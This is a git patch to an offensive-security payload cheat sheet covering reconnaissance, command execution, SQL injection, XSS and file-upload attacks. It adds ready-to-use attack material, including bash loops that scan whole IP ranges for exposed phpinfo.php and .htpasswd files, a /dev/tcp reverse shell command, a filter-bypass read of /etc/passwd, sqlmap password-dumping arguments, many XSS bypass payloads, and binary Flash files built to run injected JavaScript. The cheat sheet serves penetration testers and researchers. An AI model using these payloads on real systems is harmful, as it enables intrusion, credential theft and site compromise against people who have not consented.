From 14a82a14a41944c40007de497fed152e22121701 Mon Sep 17 00:00:00 2001
From: swisskyrepo <maxropelewski@gmail.com>
Date: Tue, 20 Dec 2016 19:46:06 +0100
Subject: [PATCH] Methodo, SQL,RCE,XSS,XXE updated

---
 Methodology_and_enumeration.md               |  70 +++++++++++--------
 Remote commands execution/README.md          |   5 ++
 SQL injection/README.md                      |   2 +-
 Upload insecure files/Insecure Flash/xss.swf | Bin 0 -> 4852 bytes
 Upload insecure files/README.md              |   3 -
 XSS injection/README.md                      |  29 +++++++-
 XSS injection/files/InsecureFlashFile.swf    | Bin 0 -> 4852 bytes
 XXE injections/README.md                     |   3 +-
 8 files changed, 77 insertions(+), 35 deletions(-)
 create mode 100644 Upload insecure files/Insecure Flash/xss.swf
 create mode 100644 XSS injection/files/InsecureFlashFile.swf

diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md
index c5cf991..1d67f02 100644
--- a/Methodology_and_enumeration.md
+++ b/Methodology_and_enumeration.md
@@ -3,6 +3,12 @@
 ## Bug Hunting Methodology
 * Enumerate all subdomains (only if the scope is *.domain.ext)
 
+Using Subbrute
+```
+python subbrute.py domain.example.com
+```
+
+
 Using KnockPy with Daniel Miessler’s SecLists for subdomain "/Discover/DNS"
 ```
 git clone https://github.com/guelfoweb/knock
@@ -11,6 +17,13 @@ git clone https://github.com/danielmiessler/SecLists.git
 knockpy domain.com -w /PATH_TO_SECLISTS/Discover/DNS/subdomains-top1mil-110000.txt
 ```
 
+Using Google Dorks
+```
+site:*.domain.com -www
+site:http://domain.com ext:php
+site:http://domain.com filetype:pdf
+```
+
 Using Jason Haddix's enumall Recon-ng script, 
 ```
 git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
@@ -58,7 +71,9 @@ sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
 • -T4 defines the timing for the task (options are 0-5 and higher is faster)
 ```
 
-* List all the subdirectories with DirBuster or GoBuster
+* List all the subdirectories and files 
+
+Using DirBuster or GoBuster
 ```
 ./gobuster -u http://buffered.io/ -w words.txt -t 10
 -u url
@@ -67,15 +82,40 @@ sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
 
 More subdomain :
 ./gobuster -m dns -w subdomains.txt -u google.com -i
+
+gobuster -w wordlist -u URL -r -e
 ```
 
-* Explore the website
+Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
+```
+#!/bin/bash
+for ipa in 98.13{6..9}.{0..255}.{0..255}; do
+wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
+```
+
+Using a script to detect all .htpasswd files in a range of IPs
+```
+#!/bin/bash
+for ipa in 98.13{6..9}.{0..255}.{0..255}; do
+wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
+```
+
+* Explore the website with a proxy (ZAP/Burp Suite)
 ```
  - Start ZAP proxy, visit the main target site and perform a Forced Browse to discover files and directories
  - Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
  - Explore and understand available functionality, noting areas that correspond to vulnerability types
 ```
 
+* Look for Web Vulns
+```
+- SQLi
+- XSS
+- RCE
+- LFI/RFI
+etc
+```
+
 * Look for private information in GitHub repos with GitRob
 ```
 git clone https://github.com/michenriksen/gitrob.git
@@ -86,31 +126,5 @@ gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.
 
 * Launch a Nikto scan in case you missed something
 
-
-## Google Dorks
-
-Google Dork to find subdomains
-```
-site:*.domain.com -www
-site:http://domain.com ext:php
-site:http://domain.com filetype:pdf
-```
-
-## Scripts
-Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
-```
-#!/bin/bash
-for ipa in 98.13{6..9}.{0..255}.{0..255}; do
-wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
-```
-
-Script to detect all .htpasswd files in a range of IPs
-```
-#!/bin/bash
-for ipa in 98.13{6..9}.{0..255}.{0..255}; do
-wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
-```
-
-
 ## Thanks to
 * http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
\ No newline at end of file
diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 0603090..a9b66e0 100644
--- a/Remote commands execution/README.md	
+++ b/Remote commands execution/README.md	
@@ -33,6 +33,11 @@ swissky@crashlab▸ ~ ▸ $ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
 RCE
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+
+swissky@crashlab▸ ~ ▸ $ X=$'uname\x20-a'&&$X
+Linux crashlab 4.4.X-XX-generic #72-Ubuntu
+
+swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
 ```
 
 NodeJS Code execution
diff --git a/SQL injection/README.md b/SQL injection/README.md
index 6a9241e..91be334 100644
--- a/SQL injection/README.md	
+++ b/SQL injection/README.md	
@@ -27,7 +27,7 @@ transformed into U+0027 APOSTROPHE (')
 ## SQL injection using SQLmap
 Basic arguments for SQLmap
 ```
-sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
+sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
 ```
 
 Custom injection in UserAgent/Header/Referer/Cookie
diff --git a/Upload insecure files/Insecure Flash/xss.swf b/Upload insecure files/Insecure Flash/xss.swf
new file mode 100644
index 0000000000000000000000000000000000000000..da8598b8fb015feffb54090af36a0b515d4d8084
GIT binary patch
literal 4852
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
G@_zv9zt++K

literal 0
HcmV?d00001

diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md
index 798f239..83dbb45 100644
--- a/Upload insecure files/README.md	
+++ b/Upload insecure files/README.md	
@@ -9,7 +9,6 @@ Reverse Shell
 Touch command
 ```
 
-
 PHP Extension
 ```
 .php
@@ -25,7 +24,6 @@ Double extension
 .png.php
 ```
 
-
 PNG Bypass a resize - Upload the picture and use a local file inclusion
 ```
 You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
@@ -33,7 +31,6 @@ curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
 curl 'http://localhost/test.php?0=system' --data "1='ls'"
 ```
 
-
 JPG Bypass a resize - Upload the picture and use a local file inclusion
 ```
 http://localhost/test.php?c=ls
diff --git a/XSS injection/README.md b/XSS injection/README.md
index c391143..6a0dcd9 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -163,6 +163,13 @@ XSS in SWF
 Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
 IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
 IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
+
+
+InsecureFlashFile.swf
+location to url: InsecureFlashFile.swf?a=location&c=http://www.google.com/
+open url to new window: InsecureFlashFile.swf?a=open&c=http://www.google.com/
+http request to url: InsecureFlashFile.swf?a=get&c=http://www.google.com/
+eval js codz: InsecureFlashFile.swf?a=eval&c=alert(document.domain)
 ```
 
 more payloads in ./files
@@ -260,7 +267,6 @@ Bypass parenthesis for string - Firefox
 alert`1`
 ```
 
-
 Bypass onxxxx= blacklist
 ```
 <object onafterscriptexecute=confirm(0)>
@@ -288,7 +294,7 @@ Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
 <img src='1' onerror='alert(0)' <
 ```
 
-Bypass using an alternate way to execute js
+Bypass using an alternate way to execute an alert
 ```
 <script>window['alert'](0)</script>
 <script>parent['alert'](1)</script>
@@ -296,6 +302,25 @@ Bypass using an alternate way to execute js
 <script>top['alert'](3)</script>
 ```
 
+Bypass ';' using another character
+```
+'te' * alert('*') * 'xt';
+'te' / alert('/') / 'xt';
+'te' % alert('%') % 'xt';
+'te' - alert('-') - 'xt';
+'te' + alert('+') + 'xt';
+'te' ^ alert('^') ^ 'xt';
+'te' > alert('>') > 'xt';
+'te' < alert('<') < 'xt';
+'te' == alert('==') == 'xt';
+'te' & alert('&') & 'xt';
+'te' , alert(',') , 'xt';
+'te' | alert('|') | 'xt';
+'te' ? alert('ifelsesh') : 'xt';
+'te' in alert('in') in 'xt';
+'te' instanceof alert('instanceof') instanceof 'xt';
+```
+
 Bypass using Unicode
 ```
 Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was
diff --git a/XSS injection/files/InsecureFlashFile.swf b/XSS injection/files/InsecureFlashFile.swf
new file mode 100644
index 0000000000000000000000000000000000000000..da8598b8fb015feffb54090af36a0b515d4d8084
GIT binary patch
literal 4852
zcmZ{mXE+<|*TAWwC>}N1Qna)vYDKCxRjT%?y{TEF_K01hR*l$%)UKJ35+f*4Vpd}W
zwP);^#(ev}&;P^!%X?k-eV=px&iZoBbsZ%med>=~BqRa(r8#b%>5~~hIEhI3`=dL=
zC*Os80tInYZ&qImhboKq!UY*Ck{WuWMe@X14!Mg}GR@!gHm5@`6>_%ey1##<XOdEq
z0-89^{?2@p`Rxs>m?leZ^+3Q(!BFT%>>yohH>F>UvxVRc9C3Z#r1?;|z}<*UzHoik
zdqk2j>%B)dp^LtV{33Jw^$R!;T)RZAtc$YXAB-Q%d=UTVthEJE%nb{`#Fn$4c5fb6
zjI6S9a!&qWJAUOgwTeT9v<~d}2DYEnS7>YY{DKyr9Duv$YJVzarBd@27jHUo)%LHC
zLVJvZVt=F7PB;2CWSb7a9IR>&#Ev~}dwj*k@rN7kS;u7DRu7#&j(u8D;9_tks0-9c
zv#7C8K;H0hsqm8%pxG=_li0Ph>XVS8B%up8LW}HNkiU0(@OgN7*W}c~Q2=Vm{RH`&
zFl2!+FPL^MQBs2XIE8pAwYNg&mO1u=K(t9HioMHp&U%YH$h~+Ko~!EqLQ@yF+7W}j
zk*al_KbDfOf24`-{?wUz*OSP=4bg&@aAf-MZ6`cV<A(YKJNbyS(8iW1P5wN?F24GM
zJ{V;vmg5?jSv$k-3u{sdZ0%hB%99aWGHuc-Jx}T@{H8^#k;qyb%AIjfJ%%=0dLp-^
zX|hQgq87VkW9M%q%@iaqwc?8RJC~NNv8d6knTfLe{9}H0Y}4cY?)EII9fp9pB2MYG
zEC>@Bw?6l`)C97f$p^H0;9Htd_C7D-pI_dngG{*lE3KbS6qWyCJPuf?bfIe$mq6yV
zwiOg;YHnF}bfVkMlkAV<M6m@LiJo^=l={Js1Q6XQOMVlciOIW{pq!SrXG24ZVM^)?
z11zV=%B{JWt2FWu_rFDYuFEy7@Go1NL<=W26U?R&eg_CwwTHr40~R3x+(OFfhgS1p
zTOAz)yP;w}WST(^_Ex&@Ln+&m#`fOkiNbqSXq)Wv+uK3k{=6o)8LxA~^p|qfTNCel
zk;tIng)#~pC08H$pN*tA_R}m3t-g6XZLU{3ByIwAj`xL`ec)ebfshWYQz~pNh3@l)
z$&hHhqtnxh1mL(AC=-@fZW8111~I!=BtFC1U%hsp>_^Fe{a!hnD?q+CJFc)=%buU-
zuX=@wIMWho{io<^YsI<#A)pA$y&HN+65zG@&{(eUW}#V*!B&R9SeC*%sOby9yC7$4
z(A;rN3NV?2q@#bWkb@i^^mVBHkHHAD`}O62tpCmbA~6CV$8Lf)1MafO_khH>9`sK>
zM&qkosZ1~xh_{%kFs<J^+#5#{;JVs~6?Bc~#Q8-{pdCA(8gzdK?ozI{To`XEdMRvn
zySrdWHYf+ygF7oV<eS~z=%4C$a5e-fRL;}O=X!;ok);GHY}v{O+&QI8E$7U~9EW=!
zT`u&Ol0GT9{pIVUKk_6Hvlq999|hezBSkM%bm>MFQ>f&9jPOh5W9U)i?_LPM^LBRN
zyvt3UvNLB}QRhs1R4KAbeN^cN2OWR$Y?p^u>6>9qFZVm%lwc-@w@yz3Dn`eS<yG=T
zrxSl(-&;G&;5J@X^rSm{u_c*|41E_VP!Jv)s&kfa&BJIuaPy+V))d)ptTwHf>KmSu
zNZ*D8<-+;rdTTS%SdCL0DLsUwJ7*F|T~Kt?znnekbdxK2vrePn63LbS|1DDV$nTsr
z!v4Bf@EEvyTby?s@D&hDeX&BQ3wONsOwLVMq3`rxxK0dmU%caHSsa=RFUv2DZP*W^
zHrPeofV2hw>q21R=_+4ToYqL^#d_mM{vqTC0lZ@l14Y^cA`Tz(d9X=JX}Vy@ds{l+
z3yaLq44&R-X#ZEmcV0aCzp#Wv-&9x$h(!kF#Q|mz7F$wQY3qx-d;i0oTt<HPG9qBb
z<Zm_((9_@uR!w9HM*1jC>O3~RsPBqBFebNQ0XHb=BBbM;dgyBHx9E%E#ZG3=xZ?MA
zAy5#9hOkzo7-wZ6g@=PyWnENy5w>Gk#>x@$YtSZFQUh=%Uab9JPYYPPQeJO;Z6u1k
zc`@u`b5=#pjcdCPxrfZ2TZd-W+PfB}mXvHCvaZOswJWdVLXfYt(v3Q`;T}=4NPYZg
z$uqlTHB`;jO=6**FktsxZ~I_#)_sE5vZcf9Kw@ythyR5=vQQN1Ibh{6-zd?eqOkLd
zcB)Ws-k{Lz1-;sc$5;baBVw!pTo*oel(&B>^sG)FVsK4$>Jh#^%4Sp)mL*eq#gwBR
zNj{Lpr=4!3fE+92>OR7ch)9uhSRrp<G(v|N3EtyL8jpo_0h*SiGdf9yRVD^x<LJ$l
ze4e^+{Q-|Cc+8#xfC{s*H>z^@@r-7c%(3syXgi2}Hr}K|=XL6JYke3E*cFsj)g1p-
zD-zCQWU^CL-T&6`oPVco?26x&Yqbe$rFW$6QUX#7v0|QTC73J{HZ@(!6gD+6MhbsF
zl7x`qj6?cydgDTR>@>P*Jj{XD+>Y10xXJa{F9~V!R}Sv5wp;v*wm)wDd#aD>M1m|Y
z|G5YjiD4)H6IvTS)*ZX=$qugi6IVcF@L%EH-RrQPm?;``i9zJr$N>f&V~B$yh4+K<
z7V!?*Be&1jCy)1C=blMqchjzUMoG>tRI?2(Qfvz#WJD#bG!0$Y_|#cws+tjcH!u=$
zZ+!-hqPVIeI4@u^@B*K3d8EF&I&XkfRg^c*R+l0(rPP|Ifn3n+D@AFcSgJ(@^gX4A
zuvDk^nyd5XP1n0yUFCOuOj&61`UJC5%sR~k#=*eR_U)S<-Igvso}NGXzuh8Q&Tvs5
zV)|kgZQ#0fx_;qJhWLsPk>0o<e1bBw-CNNk{#Rl5+7NJZ&{H#7%tcjpM`NS@GRfX-
zP3aufaHknFd`!}m|J(Pd0-s2LNmWG*>Ym2BTGt>vsroTc(ghyXWcZ-5y0nb0t>O6I
ziI(YveqFkuu2LcJ*o2IYjW0yaa6mU*Wg^1cg!jbI=Jim5B68Vp7@puQz{;nA@M1cF
z*;z=fstpaxr8ZJiu1nR^JXtu17Sox)J-VW0_7-VTl8L?aiYr!U1p*gpGEDo)t16T;
z;=2fj{9Re_w|`NMJ&@14R$0!ko?%>}?%6~{j)v@u5~c*HT_g5MW8OKl(M|}Ob)QG9
zj<IGVNeZh;Ip1%LUba1@M;9rCskxJ`!!wE!|GWTztI6LPbvsyEA$}Gi^)*=%cyWu`
z@e*0@tzBy=+M)p`kGGB<Z|T#^zq3}fe8SgS3$ZX7VFwGc2ptF>`opx%D~?z^=?d0f
zuCel6U-AIybWXErT*L0nep|UYZ~m3i$^uR;(UuVj&zh}n%d_BpC%np|lMPx37I3qc
zS}!k4zdg#MY8p+++z@d?dMTnz1=BYl1!}{Jr^|^nY_B_o=RV{cNxs_{b?6h2ic}J>
zH)BOwCCNaO%ssdXwG7@so!Um-HVGr`cC8>)VH`>Pd&V8J&Sim}1*{h(u)v<At$j-Q
z+;ZPvJ-AD{LXUCzIh24=z*T9E8bx{=J2Se#-zIaV^VGI{;)Q)O0e*tEa^Tw+29Ok(
zp_0##8RtD-GAw1Kf1E?L1!Z(U_q*!S`;txJVquk=D^4VBh%p)#!M#$HMq_=LX#iVe
zr#3gAhNe9L_wvl?mm+S&qyQX+_170-u9?j;bRc(lU@N_6!wHnz{i(lQTHY+J4NHJ5
z$;qMVz+SQ^QkxX>1~NtFSy*w^fl@yVyFKq~vITXV5T<?MAfp|uuFTfpVn=7)OZIK8
zZ9y`?b=k6M(a@Rl^<o39?1LiI-R=IJQgePk&vL)csJD&Wv3eruFx}dl@8p#l+A^@J
z(%BZCs(G!x3p?l^3dn(-jaZ6l@$_d41CpHWzGFNJA^(7hd-lf#aT^rx<k)38*s=Z!
z^HiAD=@CZ!y4$kjXQK1+>(7B*S>Bp|djSye;P<MdKM`3Tx?9P4X~$e(to!6eRt@Q@
zrO(pbQDn|LPT-C`<^2*=>}hZ%ES_YZl@x*@@usuJQe<{}lVnsbZ5YC18odn*zyNJk
z+zQ2>VBm{M8oy@}KmQIUE0MC<->Wf7_rjhRr#$fRb<LLqj+Ou`UszLXJ&l~s9Kb?`
zTW|M<)iAm9yn3Lp30LIy)I;g#alupEpV+wjTyAdi_6<|TYwJ+HiQVWmRqGL|^|`x+
zOgNd1CLm&2g>kR)9RAj!tC}IF-&xR{ec8HUg>UUNsdl|9wwXG|ayk~JB$H(92g^Hj
